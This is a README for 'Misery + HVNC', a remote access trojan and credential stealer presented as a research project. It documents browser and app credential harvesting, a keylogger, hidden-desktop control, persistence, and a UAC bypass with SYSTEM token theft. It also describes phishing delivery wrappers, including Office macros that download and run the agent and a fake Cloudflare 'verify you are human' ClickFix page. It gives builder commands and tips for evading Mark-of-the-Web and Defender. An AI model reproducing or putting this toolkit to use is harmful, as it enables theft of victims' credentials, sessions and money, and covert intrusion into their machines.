# Misery + HVNC
a devoted sister of the Church of Malware
HVNC RAT and stealer research project, derived from Misery. For local testing and research only.
## Features
- **Hidden desktop** (`hvnc start`): GDI apps on a hidden desktop, streamed live
- **Interactive browser** (`hvnc launch chrome`): real Chromium with the victim's logins, driven over CDP
- **Ghosted browser** (`ghost `): hidden Chrome/Edge session using the victim's cookies and logins
- **Credential harvesting**: Chrome, Edge, Brave, Opera, Opera GX, Firefox
- **App-session harvesting**: payment cards, Discord, Steam, Telegram, Slack, VS Code, AWS, SSH keys, Wi-Fi passwords, wallet extension paths, Signal session listing
- **Encrypted C2 channel**: reverse TCP (default) or HTTPS beaconing through a CDN
- **Payload builder** (`setup.py`): msfvenom-style config, ECDH key handling, and `-p` delivery wrappers for `docm`, `xlsm`, `lnk`, `pdf`, `html`, `clickfix_html`, `iso`, `polyglot_exe_zip`, and `polyglot_html`
- **Keylogger and clipboard monitoring**
- **Persistence**: HKCU Run key and WMI event subscriptions
- **Elevation** (`elevate`): silent UAC bypass to High via PEB masquerade and CMSTPLUA/ICMLuaUtil, then SYSTEM through SeDebug token theft from a non-PPL system process. Verified on Windows 11 25H2 (build 26200)
- **Anti-analysis**: user-mode environment checks, reflective injection
## VirusTotal
## Quick start
`setup.py` writes `src/config.h`, saves the console's ECDH key to `.misery_key`, and builds the project:
```powershell
python setup.py -g # interactive
python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -o agent # non-interactive
```
Run the console listener, then the agent:
```powershell
.\build\console.exe
.\build\agent.exe
```
Type `help` in the console for the full command list.
## Payload wrappers
The builder (`setup.py -p `) packages the agent into delivery
filetypes in `dist/` and records each one in `.manifest.json` with its
sha256 and size. `python setup.py --list-formats` prints the current list with
dependencies.
- `docm` - Word macro document; `Document_Open` shells a hidden cmd/curl download-and-run. The macro comes from a Word-authored compiled base (`wrappers_bases/docm_base.docm`); only the stage URL and agent filename are injected as document variables and read at open time, because rebuild-generated macro streams open without auto-event hooks (verified live 2026-08)
- `xlsm` - Excel macro workbook; `Workbook_Open` shells a hidden cmd/curl download-and-run. Same design: an Excel-authored compiled base (`wrappers_bases/xlsm_base.xlsm`) with the runtime values in a hidden `cfg` sheet
- `lnk` - shortcut plus companion `.cmd`; the LNK probes Downloads/Desktop for the `.cmd`, which opens a decoy PDF then fetches and runs the agent (the chain lives in the `.cmd` because Defender's FastPath flags any LNK-launched curl download cmdline)
- `pdf` - agent embedded as a PDF attachment, launched on open
- `html` - OneDrive-style page; the agent hides in a zip blob behind a button click
- `clickfix_html` - fake Cloudflare "Verify you are human" page; checking the box copies a cmd/curl download-and-run command to the clipboard and shows the Win+R / Ctrl+V / Enter steps
- `iso` - ISO with the agent inside, sidesteps MOTW
- `polyglot_exe_zip` - runs as an exe, opens as a zip holding a `document.pdf.lnk` and its companion `.cmd`
- `polyglot_html` - runs as an exe, shows a decoy page in a browser
```powershell
python setup.py -t tcp LHOST=10.0.0.5 LPORT=4444 -p docm,iso -o misery STAGE_URL=http://10.0.0.5:8080/misery.exe
```
`-p all` builds every format. The macro, lnk, clickfix, and polyglot_exe_zip
formats fetch the agent from `STAGE_URL` when the target opens them; pdf, html,
iso, and polyglot_html carry the agent themselves. The macro files ship with
decoy content, and the lnk/pdf formats show a decoy document, so they read as
normal business documents instead of empty templates.
The docm and xlsm bases are compiled by Word/Excel themselves so the
`Document_Open` / `Workbook_Open` hooks actually fire: pyopenvba-style
rebuilds write source-only module streams that Office opens in a degraded
state where the auto-events never run (reproduced and root-caused live
2026-08). The wrapper copies the base, fills decoy content, and injects the
per-build values (Word docvars in `word/settings.xml`, Excel cfg-sheet cells
in `xl/sharedStrings.xml`); the pre-compiled VBA builds the download chain
from Chr()-encoded parts plus those values at open time, so no macro stream
is ever rewritten.
The lnk and polyglot_exe_zip fetch their decoy PDF from the same directory as
`STAGE_URL`, so host the generated `.cmd` and `.decoy.pdf` next to
the agent.
Delivery note: browsers tag downloaded files with the Mark-of-the-Web
(Zone.Identifier), which trips SmartScreen on macros and executables. Extract
a container with 7-Zip or WinRAR to drop the MOTW (Explorer itself
propagates it), so the `iso` wrapper or archiver extraction is the practical
route for the macro and exe formats; the pdf and html formats are fine to
serve straight from a browser.
The wrappers use these optional libs; a missing lib just skips the formats
that need it:
```powershell
pip install pylnk3 pycdlib pikepdf python-docx openpyxl
```
The docm/xlsm bases live in `wrappers_bases/` and ship with the repo; rebuild
them in Office if you ever change the macro logic (see the wrapper docstring
notes), then commit the new base.
## Commands
| Command | What it does |
| --- | --- |
| `bot` | list bots; `bot ` targets one, `bot all` broadcasts |
| `steal` | run credential and session harvesting |
| `loot` | dump the last steal result JSON raw to the terminal |
| `elevate [system]` | relaunch the agent as admin; `system` chains to SYSTEM |
| `hvnc start` / `hvnc stop` | start or stop the hidden desktop session |
| `hvnc launch [path]` | launch an app (default Chrome) on the hidden desktop |
| `hvnc quality [10-100]` | set streamed frame JPEG quality |
| `ghost ` | open a URL in a ghosted hidden browser |
| `ghost nav ` | navigate the ghost browser |
| `ghost stop` | stop the ghost session |
| `keylog` | toggle the keylogger |
| `clip` | read the victim's clipboard |
| `shell / ps ` | run a hidden PowerShell one-liner on the agent |
| `history` | show command history |
| `clear` / `exit` | clear the terminal / quit |
## Build
Requires `cmake` and a C++ toolchain (MSVC, MinGW, or Clang).
MSVC:
```powershell
cmake -S . -B build -G "Visual Studio 17 2022" -A x64
cmake --build build --config Release
```
MinGW:
```powershell
cmake -S . -B build -G "MinGW Makefiles" -DCMAKE_BUILD_TYPE=Release
cmake --build build -j 4
```
A fresh checkout builds against `127.0.0.1:4444`. Run `setup.py` once so `.misery_key` exists.
## Layout
- `src/agent`: entry, C2 client, injector, persistence
- `src/console`: operator console + listener
- `src/payload`: payload DLL, reflective loader, trampoline
- `src/stealer`: Misery-derived sources
- `src/hvnc`: hidden-desktop session
- `src/ghost`: ghosted browser session
- `src/browser`: CDP client (Page/Input over WebSocket)
- `src/rat`: keylogger + clipboard
- `src/transport`: encrypted TCP framing, HTTPS beacon carrier, compression
- `src/evasion`: indirect syscalls, anti-analysis, UAC/token elevation, helpers
- `wrappers_bases/`: Office-authored compiled macro bases used by the docm/xlsm wrappers
- `build/`: out-of-source build dir
## Licence
No licence granted. Research code for study only; not licensed for redistribution or commercial use.